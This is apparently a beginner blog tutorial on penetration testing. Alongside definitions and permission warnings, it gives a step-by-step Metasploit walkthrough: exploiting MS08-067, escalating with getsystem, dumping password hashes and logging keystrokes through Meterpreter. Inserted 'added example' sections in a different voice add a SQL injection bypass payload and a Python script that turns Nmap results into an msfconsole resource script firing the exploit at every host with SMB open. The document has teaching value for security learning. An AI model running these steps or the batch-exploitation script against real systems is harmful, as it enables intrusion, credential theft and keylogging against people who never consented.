Wednesday 14 October 2015

Penetration Testing: Basic Guide For Beginners, Difference between hacking, ethical hacking and penetration testing


Penetration Testing: Basic Guide - picateshackz.com

Now, hackers come in all shapes, sizes and colors. Hacking is a very wide term, and by that first sentence I'm not referring to the physical characteristics of the hackers, I'm talking about the field of specialization. Believe me, there is a lot of work still to do in the wireless domain we have been working on so far (we have only touched wireless networks for the time being - you are a beginner), but wireless hacking is but a small island in the vast sea of hacking. A relatively large landmass is unarguably penetration testing, and a large name in this context is Metasploit. So here's a guide which will give you a good idea about what penetration testing is, and if you're feeling too lazy to read all of it, I've summarized the key points here.


Difference between hacking, ethical hacking and penetration testing


Hacker: simply a person who invades or interferes with another system with the intent to cause harm, without having any permission from the system owner.

Ethical hacker: a professional hired by an organization to review its security posture from the eyes of the hacker. Ethical hackers test the systems for vulnerabilities.

Penetration tester: a professional who goes a step beyond the ethical hacker and provides an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, known or unknown hardware or software flaws, or operational weaknesses. These professionals are largely involved in remediation. The whole process involves written consent and rules of engagement from the client, which clearly spell out what they can or cannot do. "This is basically our 'get out of jail free' card," Bavisi says.


I strongly recommend you read my latest article to learn more about hacking: Beginners Guide: What is Hacking and How to Become a Social Engineer



What is a penetration test?


Penetration testing, often called "pentesting", "pen testing" or "security testing", is the practice of attacking your own or your clients' IT systems in the same way an attacker would, in order to identify security holes before someone else does. Of course, you do this without actually harming the network. The person carrying out a penetration test is called a penetration tester or pentester.


  • How legal is it?


Let's make one thing crystal clear: penetration testing requires that you get permission from the person who owns the system. Otherwise you would be hacking the system, which is illegal in most countries - and trust me, you don't look good in an orange jump suit (or maybe you do, but I still don't recommend going to jail for it; buy one if you need it). In other words: the difference between penetration testing and hacking is whether you have the system owner's permission. If you want to do a penetration test on someone else's system, get written permission that spells out the scope (which hosts, which tests, which time window) before you send a single packet. Better still, get a virtual machine up and running with your already acquired VMware skills and practice on your own system.


  • What is a vulnerability?


A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities. (SQL injection is another topic I'd like to touch. Later maybe. I'm taking up too many tasks at hand at once.)



  • What is security research?

Vulnerabilities are typically found by security researchers, which is a geeky term for smart people (how much we hackers love to call ourselves smart, especially the beginners who get too cocky) who like to find flaws in systems and break them.


  • What is an exploit?


To take advantage of a vulnerability, you often need an exploit: a small and highly specialized computer program whose only purpose is to take advantage of a specific vulnerability and provide access to a computer system. Exploits often deliver a payload to the target system to grant the attacker access to it.

The Metasploit Project hosts the world's largest public database of quality-assured exploits. Have a look at their exploit database on the Metasploit site (metasploit.com).


  • What is a payload?


A payload is the piece of software that lets you control a computer system after it's been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it's a corny description, but you get the picture. Metasploit's most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you're feeling particularly bad-ass, you can even turn on a laptop's webcam and be a fly on the wall. So, to put it plainly: the exploit gets you in, and the payload is what you run once you are in. Meterpreter is a payload, not an exploit, and it doesn't give you 'some' control, it gives you nearly all of it (that's an exaggeration, but it still is the best payload). Beginners also enjoy driving it from a GUI front end such as Armitage rather than from the console.


Getting Started With Penetration Testing


I see a lot of advice given to people when they ask the question "How do I get into pentesting?" The answer usually goes like "use Metasploit / Armitage and exploit vulnerable XP systems." This approach is incorrect. Not completely, since stuff that actually works is bound to be more interesting than boring theory, but it is definitely not going to help you in the long run. To get into penetration testing and bug spotting you first need to know what you're looking for. Tools will only take you so far; personally, I don't think you should automate your pentesting until you can do it manually.


Now for the basic definitions of the terms related to penetration testing, here are a few resources that you should see. While I'm condemning the method of moving directly on to using tools, ironically, that's what we are going to do from the next tutorial onward. So before we get started, here is a set of websites you might want to check which will give you an idea of what manual work the tools automate. This information will be valuable once you start penetration testing secure networks for big security firms; automated tools alone are not going to help there.


Important Resources


  • Web Penetration Testing Lab


Web applications have become common targets for attackers. Attackers can leverage relatively simple vulnerabilities to gain access to confidential information, most likely containing personally identifiable information. While traditional firewalls and other network security controls are an important layer of any information security program, they can't defend or alert against many of the attack vectors specific to web applications. It is critical for an organisation to ensure that its web applications are not susceptible to common types of attack.


Best practice suggests that an organisation should perform a web application test in addition to regular security assessments in order to ensure the security of its web applications. In this article I will walk you through a list of deliberately vulnerable web applications you can use to build your first web penetration testing lab in Kali Linux.

Read more here



  • Sql Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. 


SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Read more here
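To make the SQL injection definition above concrete, here is an added example (my own code, not from the original article or from OWASP). It builds a throw-away SQLite database with one constructed user row, shows a login query assembled by string concatenation, the classic `' OR '1'='1' --` input that bypasses the password check against it, and the same query written with bound parameters, which treats the identical input as a harmless literal. The table name, the user, and the password are all made up for the demonstration.

```python
"""Added example: injectable login query vs. parameterized query (SQLite)."""
import sqlite3


def make_db():
    """In-memory database with one constructed user row (demo data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Client input is pasted straight into the SQL text: this is the bug.
    Whatever the user types becomes part of the query's structure."""
    query = (
        "SELECT username, role FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    """Same query, but the values are bound as parameters. The driver sends
    them as data, so they can never change the shape of the statement."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def demo():
    """Run both versions with a legitimate login and with the injection payload."""
    conn = make_db()
    # The payload closes the username string, ORs in an always-true condition,
    # and comments out the rest of the WHERE clause ("--" starts a line
    # comment in SQLite, as in most DBMSs). The vulnerable query becomes:
    #   ... WHERE username = '' OR '1'='1' --' AND password = 'anything'
    payload = "' OR '1'='1' --"
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "S3cret!"),
        "attack_vulnerable": login_vulnerable(conn, payload, "anything"),
        "legit_safe": login_safe(conn, "alice", "S3cret!"),
        "attack_safe": login_safe(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:18s} -> {row}")
```

The vulnerable version returns alice's admin row for the injected input without knowing her password; the parameterized version returns nothing for it, because the whole string is compared against the `username` column as a value. The fix is not escaping quotes by hand, it is never letting input become SQL text.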

  • Metasploit

Metasploit is one of the most popular open source penetration testing frameworks available today. It offers tons of tools that range from scanning utilities to easy-to-launch exploits, which include encoders used to bypass common security defenses. I'll walk you through an example by compromising a Windows-based authentication server that is not properly patched.


The easiest way to start using Metasploit is to download a penetration testing arsenal that includes the Metasploit framework, such as Kali Linux. Kali Linux is an operating system designed for digital forensics and penetration testing. From Kali, you can run Metasploit directly through the command line, access a Metasploit GUI front end called Armitage, or use Metasploit packages available in tools like the Social-Engineer Toolkit (SET). In my example, I'll use the traditional command line.



Read my previous article to set up Kali Linux: An Introduction To Hacker's OS: Kali Linux And Setup Tutorial.
To start using Metasploit from the CLI, open up a terminal and type "msfconsole" (on Kali it is on your PATH; older installs kept it under /opt/metasploit, in which case go there first). This brings up the msf > command prompt. Metasploit works by selecting a module defined in various folders, such as the Windows exploits found under exploit/windows/*. You can search the existing catalog of modules using "search" followed by a keyword, for example searching for RDP in the hope of finding an RDP-based exploit. It's almost impossible to guess what exploit would work on a target, so the typical use case is running a vulnerability scanner against the target to identify a weakness and matching that to an available exploit in Metasploit. For example, the next screenshots show running an Nmap scan followed by a Nessus vulnerability scan on a target to identify two critical vulnerabilities.
Scanning a target with Nmap

Running a Nessus scan on a target

I used the search function in Metasploit to identify one possible exploit that leverages the MS08-067 vulnerability identified by Nessus. Metasploit shows a rank for each module, and the Microsoft bulletin number in the module name tells you the year it was released (MS08 = 2008). My exploit is dated 2008 and has a "great" ranking, meaning it is worth trying on my target.

Exploit found that matches vulnerability in Metasploit

To use an exploit, type "use" followed by the module path; I'll use the ms08_067_netapi exploit as explained earlier. This changes the general msf > prompt to an exploit-specific prompt that shows the name of the selected exploit (in red text in the screenshot). Once there, it makes sense to see what options are available for the selected exploit; to see them, type "show options". My example shows that I need to specify the target via the remote host option, and that I can customize things such as the remote port. I'll leave everything at its default except the target, which is blank. I set RHOST using the "set" command as shown in the next example. Once the exploit is configured, type "exploit" to launch it.

Configuring and using the ms08_067_netapi exploit

If things work, I establish a connection with the victim through the Meterpreter console, shown by the meterpreter > prompt. This doesn't create a new process on the target system; it runs in the context of the process being exploited. I can view the available commands using the "help" keyword, which includes anything from downloading files and modifying route tables to identifying and taking a snapshot from a connected webcam. Available commands vary with the privilege level obtained; the privileged ones are labeled "Priv", such as the ability to dump the password hashes from the SAM. A common example run from Meterpreter is logging all keystrokes with the goal of capturing passwords. This is done using "keyscan_start" to start the sniffer and "keyscan_dump" to see what was captured. The options to cause havoc on a compromised system are endless.

Running an exploit successfully in Metasploit


A common first step once inside a system is checking what privilege level you have established on the compromised system using the "getuid" command. If you are not at the highest level, such as SYSTEM on Windows or root on Linux, you can attempt to escalate using the "getsystem" command. My example got SYSTEM access from the initial exploit.
Checking privilege level in meterpreter
To navigate a compromised Windows system, you can open a shell using the "shell" command as shown in the next example. You can also use the file system commands available in the Meterpreter console that do similar things, such as "pwd" to see what directory you are in or "download [file path]" to download files from the compromised target.
Access Windows Shell from meterpreter

Checking system info on compromised system
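The walkthrough above (scan with Nmap, match the finding to a module, use / show options / set RHOST / exploit) is interactive and driven by screenshots. As an added example, not from the original article and not Metasploit's own code, here is a small Python script that turns the first part of that procedure into something repeatable: it parses Nmap's XML output (`nmap -oX`), keeps only live hosts with 445/tcp open (the SMB port that ms08_067_netapi targets), and writes the msfconsole commands from the walkthrough as a resource script you can run with `msfconsole -q -r ms08_067.rc`. The XML scan result embedded below is constructed for the demonstration, not a real scan; the IP addresses are private lab addresses I made up. The module path `exploit/windows/smb/ms08_067_netapi` is the real Metasploit path for the exploit named in the article.

```python
"""Added example: Nmap XML -> SMB targets -> msfconsole resource script."""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -p 139,445 -oX scan.xml 192.168.56.0/24`
# output: one host with SMB open, one with SMB filtered, one down.
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 139,445 -oX scan.xml 192.168.56.0/24">
  <host><status state="up"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.56.103" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

MODULE = "exploit/windows/smb/ms08_067_netapi"


def smb_targets(xml_text):
    """Return the IPv4 addresses of live hosts that have 445/tcp open."""
    root = ET.fromstring(xml_text)
    targets = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # Nmap marks unreachable hosts as down; skip them
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.findall("ports/port"):
            state = port.find("state")
            if (port.get("protocol") == "tcp" and port.get("portid") == "445"
                    and state is not None and state.get("state") == "open"):
                targets.append(addr.get("addr"))
                break  # one entry per host is enough
    return targets


def resource_script(targets, module=MODULE):
    """msfconsole commands in the article's order: use -> show options ->
    set RHOST -> exploit. `exploit -j` runs the attempt as a background job so
    the script continues to the next target instead of dropping you into the
    first session; attach later with `sessions -i <id>`. The article's
    Metasploit called the option RHOST; current versions call it RHOSTS."""
    lines = [f"use {module}", "show options"]
    for ip in targets:
        lines += [f"set RHOST {ip}", "exploit -j"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    ips = smb_targets(NMAP_XML)
    with open("ms08_067.rc", "w") as fh:
        fh.write(resource_script(ips))
    print(f"{len(ips)} target(s) written to ms08_067.rc: {', '.join(ips)}")
```

Two caveats a practitioner would want: an open 445 only tells you SMB is listening, not that the host is unpatched, so run the scanner (Nessus in the article, or Metasploit's own `check` command after `use`) before firing the exploit, and every address that ends up in the resource script must be inside the written scope you agreed with the owner.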

Metasploit has tons of other applications, such as fuzzing and spoofing; however, there are more tools available in Kali Linux that may be better for those purposes. Check out metasploit.com for more tutorials and other useful information.
